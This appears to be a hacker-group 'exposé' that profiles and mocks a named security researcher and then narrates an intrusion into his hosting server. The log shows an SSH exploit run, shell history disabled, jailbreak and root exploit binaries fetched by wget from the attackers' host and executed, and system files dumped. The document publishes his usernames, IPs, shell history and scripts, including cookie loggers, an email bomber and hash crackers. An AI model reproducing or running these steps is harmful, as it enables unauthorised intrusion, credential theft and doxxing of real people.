                 __   .__
_____     ____ _/  |_ |__|           ______  ____   ____
\__  \   /    \\   __\|  |  ______  /  ___/_/ __ \_/ ___\
 / __ \_|   |  \|  |  |  | /_____/  \___ \ \  ___/\  \___
(____  /|___|  /|__|  |__|         /____  > \___  >\___  >
     \/      \/                         \/      \/     \/group.

anti-sec:~# cd expose/
anti-sec:~/expose# cat glafkos.info

Glafkos Charalambous AKA nowayout / nowayin,

You may know him from his contributions to the security scene:

- http://www.milw0rm.com/papers/186 ~ Securing and Hardening Linux v1.0
- http://www.milw0rm.com/papers/286 ~ Bypassing Windows Server 2008 Password Protection
- http://www.milw0rm.com/exploits/7216 ~ WebStuido CMS Blind SQL Injection
- http://www.milw0rm.com/exploits/7722 ~ DZcms Remote SQL Injection

... and a couple of thousand *lethal* XSS exploits...

He was also part of Astalavista ( RIP ) staff. Looks like everyone involved in that cult is a security expert.

Websites owned and managed by nowayout:

- http://www.infosec.org.uk ~ Information Security Uncensored / Exploits / MD5 Cracker / Default Ports / Tools / Security News / Videos / Papers
- http://www.itsolutionskb.com ~ IT Solutions Knowledge Base
- http://www.md6.me ~ MD6 Hash Calculator
- http://www.defaultports.com ~ Default DB Ports, Computer Ports, TCP/UDP Ports, Services, Protocols
- http://www.scanpc.org ~ Your FREE Online Port Scanne
- http://www.webhostline.com ~ His little hosting company

Quotes from his CV:

- B.Sc. in Computer Science;
  System Analysis & Design, Digital Logic, Database Management, Assembly, Local & Metropolitan Area Networks, Data Communications & Computer Networks, Operating Systems, Software Engineering, Advanced Programming in UNIX Environment, Computer Graphics, Object Oriented Programming, Compiler Writing, Machine Learning, Artificial Intelligence, Parallel Processing, Internet Technologies, Multimedia Programming (Java), Image & Signal Processing, Algorithms & Complexity, Programming Languages, Object Oriented Database Management, Visual Programming, Advance Numerical Methods, Computer Aided Design, Logic Programming, Data Structures, Mathematics

- Work:
  Managed IT Services Coordinator
  Setup and Configuration of Business Application Solutions
  Users Training
  Users Support
  Systems Security, Maintenance, Monitoring, Reporting
  Security Consulting
  Hosting Management
  Server(s) maintenance/management (AD, Group Policies, ISA, MSSQL, IIS, Exchange, Remote Access, VPN)
  Network maintenance/management (Switch, Routers, Wireless)
  Internet, Intranet, Backups, Antivirus & WSUS maintenance/management
  Website Design & Backend support
  Helpdesk support & monitoring
  Installation & Maintenance of client computers
  IT Department Policies
  Software Development
  Penetration Testing/System Security

- Computer Skills ( We believe he posses _none_ ):
  Vulnerability testing, network security auditing as well as extensive experience in hardening/securing GNU/Linux & Windows public facing servers including web, ftp & email servers
  Programming languages: Assembly, C/C++, Java, Visual Basic 6/.NET, C# .NET, Perl, Python
  Web Programming/Scripting languages: JSP, Servlets, ASP, PHP, Perl, XHTML, AJAX, JavaScript
  Relational Database Management Systems (RDBMS MySQL/MSSQL) and database design
  Expert user/administrator of Microsoft DOS, Windows 95/98/NT/2000/XP/Vista/2003/2008 as well as their server equivalent incarnations and various *BSD, GNU/Linux operating systems (FreeBSD, OpenBSD, Slackware, SUSE, CentOS, Mandrake, Red Hat, Ubuntu, BackTrack)
  Extensive, hands-on, experience with various graphic related computer packages (Photoshop, Fireworks etc.)
  Extensive experience with various web design related computer packages (Dreamweaver, Flash etc.)
  Extensive experience with MS-Office (Word, Excel, Access, PowerPoint, Outlook)
  Extensive experience in administrating/securing GNU/Linux & Windows public facing servers
  A decade of experience in troubleshooting, technical, hardware and network related, problems

- Certifications ( What kind of an idiot passes a certificate of any kind to this moron? ):
  Cisco Certified Network Associate - (CCNA)
  Certified Ethical Hacker - (CEH)
  Computer Hacking Forensic Investigator - (CHFI)
  Network Security Administrator - (NSA)
  Certified Security Analyst - (ECSA)
  Licensed Penetration Tester - (LPT)
  Microsoft Certified IT Professional - (MCITP)
  Microsoft Certified Technology Specialist - (MCTS)

- Interests:
  I enjoy taking on challenges on Penetration Testing, Network Security, Programming, Logic, Reverse Engineering, Steganography and Cryptology on various security related websites (ref: hackits.de handle: nowayout)
  I enjoy reading programming and security related books and I have a sizeable library of relevant books and references.
  Astalavista.com/.net - The hacking & security community - Administrator (One of the biggest security related site worldwide) ( *We beg to differ* *wink* )
  BlackHat-Forums.com - Administrator in a well known forum for security professionals to share and discuss security related information
  Writing advisories and exploits for system and web vulnerabilities

- Publications:
  Reverse Engineering: Anti-Cracking Techniques Paper
  Reverse Engineering: Smashing The Signature Paper
  Securing & Hardening Linux v1.0 Paper
  802.11 WPA-PSK Crack Video Tutorial
  802.11 Packet Injection in Windows Video Tutorial

Holy crap! With that kind of CV, you would expect the person to *actually* know his way around computers, securing systems, having flawless code, etc.

After we saw him poking around the Astalavista Exposure trying to find out who was behind it, we decided to take a look at his box(es).

After all, we're not supposed to find anything...

...right?

EOF.

anti-sec:~/expose# cd ~/pwn/
anti-sec:~/pwn# ./infoz infosec.org.uk
IP: 66.96.220.213
NS:
- ns1.webhostline.com
- ns2.webhostline.com
Mail Server:
- 66.96.220.213 > 6696220213.hostnoc.net
WWW Server: Apache
SSH Banner: SSH-2.0-OpenSSH_4.3 : PORT 2222
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./openPWN -h 66.96.220.213 -p 2222 -l=users.txt
[+] openPWN - anti-sec group
[+] Target: 66.96.220.213
[+] SSH Port: 2222
[+] List: users.txt
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
user: crownvip
uname: Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux
sh-3.1$ export HISTFILE=/dev/null
sh-3.1$ w
11:23:39 up 306 days, 1:02, 1 user, load average: 0.77, 0.62, 0.64
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sh-3.1$ who
infosec pts/2 2009-06-05 06:41 (91.184.220.239)

// We got in, while he is -on- the server... is he going to catch us ( considering his amazing CV )? lets wait and see...

sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/usr/local/cpanel/bin/jailshell
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env

// Awww, jailshell...
sh-3.1$ wget http://anti.sec.labs/MichaelScofield
--13:33:37-- http://anti.sec.labs/MichaelScofield
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4921 (4.8K) [text/plain]
Saving to: `MichaelScofield'

100%[=========================================================================================================================================>] 4,921 --.-K/s in 0.08s

11:27:57 (64.0 KB/s) - `MichaelScofield' saved [4921/4921]

sh-3.1$ chmod +x MichaelScofield
sh-3.1$ ./MichaelScofield
[+] MichaelScofield - Prison Breaker / anti-sec group
[+] Grabbing environment variables...
SHELL=/usr/local/cpanel/bin/jailshell
[+] Injecting new shell..
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
SHELL=/bin/sh
sh-3.1$ env
MANPATH=/usr/lib/courier-imap/man:
HOSTNAME=srv01.webhostline.com
SHELL=/bin/sh
TERM=xterm
HISTSIZE=1000
SSH_CLIENT=13.33.33.37 35154 2222
SSH_TTY=/dev/pts/1
USER=crownvip
MAIL=/var/spool/mail/infosec
PWD=/home/crownvip
INPUTRC=/etc/inputrc
JAVA_HOME=/usr/local/jdk
EDITOR=pico
LANG=en_US.UTF-8
HOME=/home/crownvip
SHLVL=4
LS_OPTIONS=--color=tty -F -a -b -T 0
LOGNAME=crownvip
CVS_RSH=ssh
VISUAL=pico
SSH_CONNECTION=13.33.33.37 35154 66.96.220.213 2222
CLASSPATH=.:/usr/local/jdk/lib/classes.zip
LESSOPEN=|/usr/bin/lesspipe.sh %s
HISTFILE=/dev/null
G_BROKEN_FILENAMES=1
_=/usr/bin/env

// Prison Break FTW.
sh-3.1$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
cpanel:x:32001:32001::/usr/local/cpanel:/bin/false
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash
mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false
cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/bin/noshell
cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/local/cpanel/bin/noshell
cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/local/cpanel/bin/noshell
cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local/cpanel/bin/noshell
x00mario:x:32007:32009::/home/x00mario:/usr/local/cpanel/bin/jailshell
defaultp:x:32008:32010::/home/defaultp:/usr/local/cpanel/bin/jailshell
astalavi:x:32009:32011::/home/astalavi:/usr/local/cpanel/bin/noshell
whitelig:x:32010:32012::/home/whitelig:/usr/local/cpanel/bin/jailshell
divecom:x:32011:32013::/home/divecom:/usr/local/cpanel/bin/noshell
glafkos:x:32012:32014::/home/glafkos:/usr/local/cpanel/bin/noshell
infosec2:x:32013:32015::/home/infosec2:/usr/local/cpanel/bin/jailshell
whitegr:x:32014:32016::/home/whitegr:/usr/local/cpanel/bin/jailshell
glafcom:x:32015:32017::/home/glafcom:/usr/local/cpanel/bin/jailshell
webhostl:x:32016:32018::/home/webhostl:/usr/local/cpanel/bin/jailshell
infosec:x:32017:32019::/home/infosec:/bin/bash
ryb:x:32018:32020::/home/ryb:/usr/local/cpanel/bin/jailshell
ariadmin:x:32019:32021::/home/ariadmin:/usr/local/cpanel/bin/noshell
indianos:x:32020:32022::/home/indianos:/usr/local/cpanel/bin/noshell
nowayin:x:32021:32023::/home/nowayin:/usr/local/cpanel/bin/noshell
forextrd:x:32022:32024::/home/forextrd:/usr/local/cpanel/bin/jailshell
itteam:x:32023:32025::/home/itteam:/bin/bash
itkb:x:32024:32026::/home/itkb:/bin/bash
infosecs:x:32025:32027::/home/infosecs:/usr/local/cpanel/bin/noshell
toxworx:x:32026:32028::/home/toxworx:/usr/local/cpanel/bin/noshell
scanpc:x:32027:32029::/home/scanpc:/bin/bash
mako:x:32028:32030::/home/mako:/bin/bash
bufferov:x:32029:32031::/home/bufferov:/bin/bash
exploitm:x:32030:32032::/home/exploitm:/usr/local/cpanel/bin/jailshell
md5org:x:32031:32033::/home/md5org:/bin/bash
webtech:x:501:501::/home/webtech:/usr/local/cpanel/bin/jailshell
mariosto:x:502:502::/home/mariosto:/usr/local/cpanel/bin/noshell
md6me:x:510:510::/home/md6me:/bin/bash
royallim:x:511:511::/home/royallim:/usr/local/cpanel/bin/noshell
crownvip:x:513:513::/home/crownvip:/usr/local/cpanel/bin/jailshell
dnsmafia:x:514:514::/home/dnsmafia:/bin/bash
sh-3.1$ uname -a
Linux srv01.webhostline.com 2.6.21.5-hostnoc-3.1.7-libata-grsec-32 #1 SMP Mon Feb 11 06:36:58 EST 2008 i686 i686 i386 GNU/Linux
sh-3.1$ wget http://anti.sec.labs/r00tr00t
--13:33:37-- http://anti.sec.labs/r00tr00t
Resolving anti.sec.labs... 13.33.33.37
Connecting to anti.sec.labs|13.33.33.37|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207614 (203K) [text/plain]
Saving to: `r00tr00t'

100%[=========================================================================================================================================>] 207,614 445K/s in 0.5s

14:33:02 (445 KB/s) - `r00tr00t' saved [207614/207614]

sh-3.1$ chmod +x r00tr00t
sh-3.1$ ./r00tr00t
[+] r00tr00t - anti-sec group
[+] "Root is a state of mind"
r0000000000000000000000000000t state achieved.
sh-3.1# cat /etc/shadow
sh-3.1# lastlog | grep -v Never
Username Port From Latest
defaultp pts/6 91.184.220.239 Wed May 6 02:46:02 -0400 2009
glafcom pts/0 213.207.156.52 Tue Sep 30 02:28:48 -0400 2008
webhostl pts/1 91.184.220.239 Sun May 24 05:09:36 -0400 2009
infosec pts/2 91.184.220.239 Fri Jun 5 06:41:51 -0400 2009
itkb pts/3 91.184.220.239 Mon Jun 8 11:41:16 -0400 2009
scanpc pts/4 91.184.220.239 Wed May 6 02:35:33 -0400 2009
mako pts/1 67.225.142.98 Thu May 21 06:14:56 -0400 2009
md5org pts/2 91.184.220.239 Sat Jan 3 14:27:24 -0500 2009
webtech pts/0 79.101.197.121 Fri Feb 20 10:58:09 -0500 2009
md6me pts/2 91.184.220.239 Mon Jun 1 14:14:18 -0400 2009
royallim pts/3 91.184.220.239 Mon May 11 04:20:45 -0400 2009
crownvip pts/4 91.184.220.239 Mon Jun 8 12:14:08 -0400 2009

// Lets see what Mr Glafkos got on his server...

sh-3.1# cd ~infosec
sh-3.1# ls -la
total 368
drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 .
drwxr-xr-x 43 root root 4096 Jun 8 00:20 ..
lrwxrwxrwx 1 infosec infosec 33 Jul 25 2008 access-logs -> /usr/local/apache/domlogs/infosec
-rw-r--r-- 1 infosec infosec 24 Feb 23 2007 .aspell.en.prepl
-rw-r--r-- 1 infosec infosec 21 Feb 23 2007 .aspell.en.pws
-rw------- 1 infosec infosec 15255 Jun 5 07:04 .bash_history
-rw-r--r-- 1 infosec infosec 24 Jan 26 2007 .bash_logout
-rw-r--r-- 1 infosec infosec 191 Jan 26 2007 .bash_profile
-rw-r--r-- 1 infosec infosec 124 Jan 26 2007 .bashrc
drwx------ 23 infosec infosec 4096 May 9 12:23 bck
-rw------- 1 infosec infosec 22 May 17 06:19 .contactemail
drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 .cpaddons
-rw-r--r-- 1 infosec infosec 0 Feb 9 2007 .cpaddons_notify
drwxr-xr-x 5 infosec infosec 4096 Jan 8 17:18 .cpanel
-rw-r----- 1 infosec infosec 1 Jan 15 00:05 cpbackup-exclude.conf
drwxr-xr-x 3 infosec infosec 4096 Jul 25 2008 cpmove.psql
-rw-r--r-- 1 infosec infosec 14 Jun 8 14:03 .dns
-rw-r--r-- 1 infosec infosec 7661 Jan 19 04:21 domain.txt
drwx------ 2 infosec infosec 4096 Mar 11 2007 .elinks
-rw-r--r-- 1 infosec infosec 383 Jan 26 2007 .emacs
-rw-r--r-- 1 root root 416 Jul 29 2008 error_log
drwxr-x--- 3 infosec mail 4096 Jun 9 2008 etc
drwxr-xr-x 6 infosec infosec 4096 Jun 9 2008 .fantasticodata
-rw------- 1 infosec infosec 16 May 26 00:04 .ftpquota
drwx------ 2 infosec infosec 4096 Jun 9 2008 .gnupg
-rw-r--r-- 1 infosec infosec 348 Oct 22 2007 .gpgtemp
-rwxr-xr-x 1 infosec infosec 205 Mar 9 2008 host2port.sh
-rw-r--r-- 1 infosec infosec 1315 Mar 20 2008 host.c
-rw-r--r-- 1 infosec infosec 1393 Mar 5 2008 hostnames.c
drwxr-x--- 2 infosec nobody 4096 Jul 25 2008 .htpasswds
-rw-r--r-- 1 infosec infosec 2048 Mar 19 05:57 infosecbackup.php
-rwxr-xr-x 1 infosec infosec 673 Nov 3 2008 infosecbackup.sh
-rw-r--r-- 1 infosec infosec 7 Jul 25 2008 .lang
-rw------- 1 infosec infosec 14 Jun 8 12:15 .lastlogin
drwx------ 2 infosec infosec 4096 Aug 11 2007 logs
drwxrwx--- 11 infosec infosec 4096 Jul 25 2008 mail
-rw-r--r-- 1 infosec infosec 36 Jan 26 2007 .mailboxlist
drwxr-xr-x 2 infosec infosec 4096 Nov 27 2008 md5proc
-rw------- 1 infosec infosec 1 Jun 6 2007 mysql-db-count
-rw------- 1 infosec infosec 404 Apr 15 2008 .mysql_history
drwx------ 2 infosec infosec 4096 Feb 15 2007 .neomail
drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-glafkos
drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-ishtus
drwx------ 3 infosec infosec 4096 Jun 9 2008 .neomail-yiannos
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 perl
-rw-r--r-- 1 infosec infosec 782 Oct 13 2007 popdel.py
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 psd
drwxr-xr-x 3 infosec infosec 4096 Jul 25 2008 public_ftp
drwxr-x--- 33 infosec nobody 4096 May 9 12:27 public_html
-rw-r--r-- 1 infosec infosec 75671 Mar 28 2008 rfibot.pl
drwx------ 2 infosec infosec 4096 Jun 8 14:01 .spamassassin
-rw-r--r-- 1 infosec infosec 0 Nov 9 2007 .spamassassinboxenable
-rw-r--r-- 1 infosec infosec 0 Nov 9 2007 .spamassassinenable
drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 spike
-rw-r--r-- 1 infosec infosec 41558 Nov 23 2007 spike_phpSecAudit_0.27.zip
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .sqlier
drwx------ 2 infosec infosec 4096 Jun 9 2008 .sqmaildata
drwx------ 4 infosec infosec 4096 Jun 9 2008 ssl
-rw-r--r-- 1 infosec infosec 1803 Mar 8 2008 test.c
drwxr-xr-x 7 infosec infosec 4096 Jun 8 12:16 tmp
drwx------ 2 infosec infosec 4096 May 30 2007 .trash
lrwxrwxrwx 1 infosec infosec 11 Jul 25 2008 www -> public_html
-rw-r--r-- 1 infosec infosec 658 Jul 25 2008 .zshrc
sh-3.1# cat .bash_history
php remotesearch.php
nano remotesearch.php
[snip x 100000]
lynx http://www.md5oogle.com/decrypt.php?input=
ls
php remotesearch.php
nano remotesearch.php
php remotesearch.php
ps -x
kill -9 30000
kill -9 30008
kill -9 30009
kill -9 30108
kill -9 30494
[snip]
cat cracked.txt
rm cracked.txt
rm notfound.txt
rm queue.txt
mv queue2.txt queue.txt
[snip]
rm notfound.txt
cat cracked.txt
rm cracked.txt
clear
php remotesearch.php
cat cracked.txt
wc -l cracked.txt
wc -l notfound.txt
wc -l queue.txt
cat notfound.txt
nano notfound.txt
wc -l queue.txt
wc -l queue.txt
wc -l notfound.txt
wc -l cracked.txt
df -h
mem
top
ls
[snip]
cat cracked.txt
cd www
cd md5/
cd scripts/
wc -l cracked.txt
nano readmd5hash.php
php readmd5hash.php
clear
ls
[snip]
ls -la out.sql
cat out.sql
cd rc
ls
cd ..
ls
cd _php
ls
cd md5/
ls
nano ajaxcalc.php
pwd
nano ajaxcalc.php
[snip]
cat cracked.txt
wget http://milw0rm.com/mil-dic.php <-- milw0rm fanboy.
php md5import.php mil-dic.txt
cat queue.txt
nano autocracker.php
php autocracker.php
wc -l queue.txt
cat queue.txt
ls
[snip]
nano md5.php
nano md5.php
nano md5.php
$req = mysql_query("INSERT INTO $dbtabl (id, md5, plaintext) VALUES ('','$result', '$string')") or die($msger3);
cd ..
cd md5/
cd scripts/
wc -l crack
wc -l cracked.txt
cat cracked.txt
[snip]
rm notfound.txt
ifconfig -a
ping 10.0.7.198
su
ls -la
[snip]
cat md5sorted.txt | cut -d";" -f 2
cat md5sorted.txt | cut -d";" -f 2 > md5plaintext.txt
[snip]
nano domains.html
cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview">"
cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview\">"
cat domains.html | grep "__CMD[DomainOverview]:SELWRP=domainOverview "
wc -l domains.html
cat domains.html | grep uibs.net
cat domains.html | grep uibs.net | cut -d ">"
cat domains.html | grep uibs.net | cut -d ">" -f 1
cat domains.html | grep uibs.net | cut -d ">" -f 2
cat domains.html | grep domainOverview | cut -d ">" -f 2
cat domains.html | grep =domainOverview | cut -d ">" -f 2
[snip]
cd /dev/sda4
mount
cd /
dir
ls -la
rm 32-libata.tar.gz
su
su
exit
su info@sec.org.uk
[snip]
ls -la
crontab -l
su
df -h
su - root
cd www
ls
su
last
lastlog
[snip]
ls
wget http://dnsenum.googlecode.com/files/dnsenum1.2.tar.gz
unzip dnsenum1.2.tar.gz
tar -zxvf dnsenum1.2.tar.gz
cd dnsenum1.2
ls
./dnsenum.pl
./dnsenum.pl
./dnsenum.pl
./dnsenum.pl
./dnsenum.pl charpilakoutas.com.cy
./dnsenum.pl charpilakoutas.com.cy -f dns.txt <-- Certified Ethical Hacker's best friend.
ftp nowayout.no-ip.org
su
crontab -l
ping taveli.com
[snip]
su
nmap -v -P0 mail.sobohgroup.com <-- Network Security Administrator's best friend.
nmap -v -P0 213.207.162.192
nmap -v -P0 mail.sobohgroup.com
[snip]
ftp nowayout.myftp.org
cd www
ls
cd themes/
[snip]
cat cpbackup-exclude.conf
cd www
ls
d -sch
du -sch
ls
rm -r *.rar
ls
du -h --max-depth=1
[snip]
tar --help | grep bzip <-- He shows serious Linux skills, phear.
tar --help | grep bz2
sh-3.1# cd bck
sh-3.1# ls -la
total 3800
drwx------ 23 infosec infosec 4096 May 9 12:23 .
drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 ..
drwxr-xr-x 9 infosec infosec 4096 Jun 9 2008 administrator
drwxr-xr-x 4 infosec infosec 4096 Jun 9 2008 ajaxmd5
drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 cache
drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 ceh
drwxr-xr-x 2 infosec infosec 4096 Feb 16 2007 cgi-bin
-rw-r--r-- 1 infosec infosec 99938 Dec 24 2006 CHANGELOG.php
drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 code
drwxrwxrwx 29 infosec infosec 4096 Jun 9 2008 components
-rw-rw-rw- 1 infosec infosec 2709 Aug 2 2007 configuration.php
-rw-r--r-- 1 infosec infosec 4251 Dec 24 2006 configuration.php-dist
-rwxrwxrwx 1 infosec infosec 294 Jun 2 2007 cookies.php
-rwxrwxrwx 1 infosec infosec 198 Jun 2 2007 cookies.txt
-rw-r--r-- 1 infosec infosec 3429 Dec 24 2006 COPYRIGHT.php
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 editor
-rw-r--r-- 1 nobody nobody 535 Aug 2 2007 error_log
drwxr-xr-x 7 infosec infosec 4096 Jun 9 2008 exam
-rw-r--r-- 1 infosec infosec 3535 Feb 9 2007 globals.php
-rw-r--r-- 1 infosec infosec 145 Mar 1 2007 hello.pl
drwxr-xr-x 3 infosec infosec 16384 Jun 9 2008 help
drwxrwxrwx 7 infosec infosec 4096 Jun 9 2008 images
drwxr-xr-x 10 infosec infosec 4096 Jun 9 2008 includes
-rw-r--r-- 1 infosec infosec 5223 Feb 9 2007 index2.php
-rw-r--r-- 1 infosec infosec 8491 Feb 9 2007 index.php
drwxr-xr-x 2 infosec infosec 4096 Apr 21 2007 infosecis
drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 language
-rw-r--r-- 1 infosec infosec 17977 Dec 24 2006 LICENSE.php
-rw-r--r-- 1 infosec infosec 710 Dec 24 2006 mainbody.php
drwxrwxrwx 8 infosec infosec 4096 Jun 9 2008 mambots
drwxr-xr-x 6 infosec infosec 4096 Jun 9 2008 md5
drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 media
drwxrwxrwx 15 infosec infosec 4096 Jun 9 2008 modules
-rw-r--r-- 1 infosec infosec 3555493 May 27 2007 nvdcve-2007.xml
-rw-r--r-- 1 infosec infosec 2474 Dec 24 2006 offlinebar.php
-rw-r--r-- 1 infosec infosec 4929 Dec 24 2006 offline.php
-rw-r--r-- 1 infosec infosec 709 Dec 24 2006 pathway.php
-rw-r--r-- 1 infosec infosec 286 Dec 24 2006 robots.txt
-rwxrwxrwx 1 infosec infosec 0 Jun 2 2007 steal.php
drwxr-xr-x 5 infosec infosec 4096 Jun 9 2008 tabs
drwxrwxrwx 10 infosec infosec 4096 Jun 9 2008 templates
-rw-r--r-- 1 infosec infosec 9641 May 27 2007 vuln.php
drwxrwxr-x 4 infosec infosec 4096 Jun 9 2008 xcms
sh-3.1# cat configuration.php
sh-3.1# cat cookies.php
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); fclose($fp); ?>

// Ph34r the CEH, he logs your cookies.

sh-3.1# cat hello.pl
#!/usr/bin/perl
use strict;
use CGI ':standard';
print header;
print start_html('Hello World');
print h1('Hello World');
print end_html();
exit;

// Hai :]

sh-3.1# head vuln.php
#!/usr/bin/php -q
rn";
$to=$_POST['to'];
$from=$_POST['from'];
$reply=$_POST['reply'];
$headers="From: ".$from."rnReply-To: ".$reply;
$subject=$_POST['subject'];
$message=$_POST['textarea'];
$num=$_POST['num'];
$counter=range(1,$num);
if(isset($to) && isset($from) && isset($message) && $num!=NULL){
foreach($counter as $counter) {
if (mail($to, $subject, $message, $headers)){
echo "Mail sent!rn";
echo "

Mail nAasAA? ".$counter." succesfully sent!rn";
}
else {
echo "Mail not sentrn";
echo "Mail nAasAA? ".$counter."couldn't be sent, please try again.rn";
}
}
}
elseif($num==NULL){
if (@mail($to, $subject, $message, $headers)){
echo "Mail sent!rn";
echo "

Mail succesfully sent!rn";
}
else {
echo "Mail not sentrn";
echo "Mail couldn't be sent, please try again.rn";
}
}
else{
echo "Please fill in all necessary fields.";
}
}
//display mail form
function mail_form() {
echo << Email Spoofer/Bomber Email Spoofer/Bomber

receiver:
your email:
reply email:
subject:
send email times
text:

Warning: bombing an email takes a while, please be patient!

Note: the website admin cannot be held responsible for possible abuse of this email script.
DISPLAY_FORM;
}
$send=$_POST['send'];
//execute functions
if(isset($send)){
send_mail();
}
else{
mail_form();
}
?>

// Don't piss off nowayout, he _WILL_ bomb your email.

sh-3.1# cd ../dictbf
sh-3.1# ls -la
total 12
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .
drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 ..
-rw-r--r-- 1 infosec infosec 3536 Feb 22 2007 brutepass.php
sh-3.1# cat brutepass.php
document.getElementById("result").innerHTML="trying - ".$word.""";
if ($enc($word) == $hash) {
print "Match found! password is $word";
echo "";
exit;
}
}
[snip]

// ...If you don't have one tho, he will crack your hash.

sh-3.1# cd ../hashcrk
sh-3.1# ls -la
total 12
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .
drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 ..
-rw-r--r-- 1 infosec infosec 464 Feb 22 2007 index.php
sh-3.1# cat index.php
$hash="81dc9bdb52d04dc20036dbd8313ed055";
$type="md5";
$words = file("sdict.txt");
// Loop through all words
foreach ($words as $word)
{
$word = rtrim($word);
print "trying - ".$word." - ".$type($word)."n
";
if ($type($word) == $hash)
{
print "Match found! $word = $hashn";
exit;
}
}
print "No matches found!n";
?>
(This code has been tryed and tested, and yes the $type does work. Allowing you to crack md5(), SHA1() and crypt(). I hope you enjoy this!)

// We've seen so far a few scripts in PHP. We also saw another PHP script, and another one. Wait a moment... doesn't his CV list all kinds of other languages? Is he a liar or a PHP fanboy?

sh-3.1# cd ../logger
sh-3.1# ls -la
total 16
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .
drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 ..
-rw-r--r-- 1 infosec infosec 380 Feb 22 2007 index.php
-rw-rw-rw- 1 infosec infosec 430 Feb 24 2007 logs.html
sh-3.1# cat index.php
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'


'); fclose($fp);
header ("Location: /index.php");
?>
This will log your ip and cookies:D assh0l3

// XSS Vulnerable cookie logger, while you think you got my cookies.. I am logging yours, assh0l3.

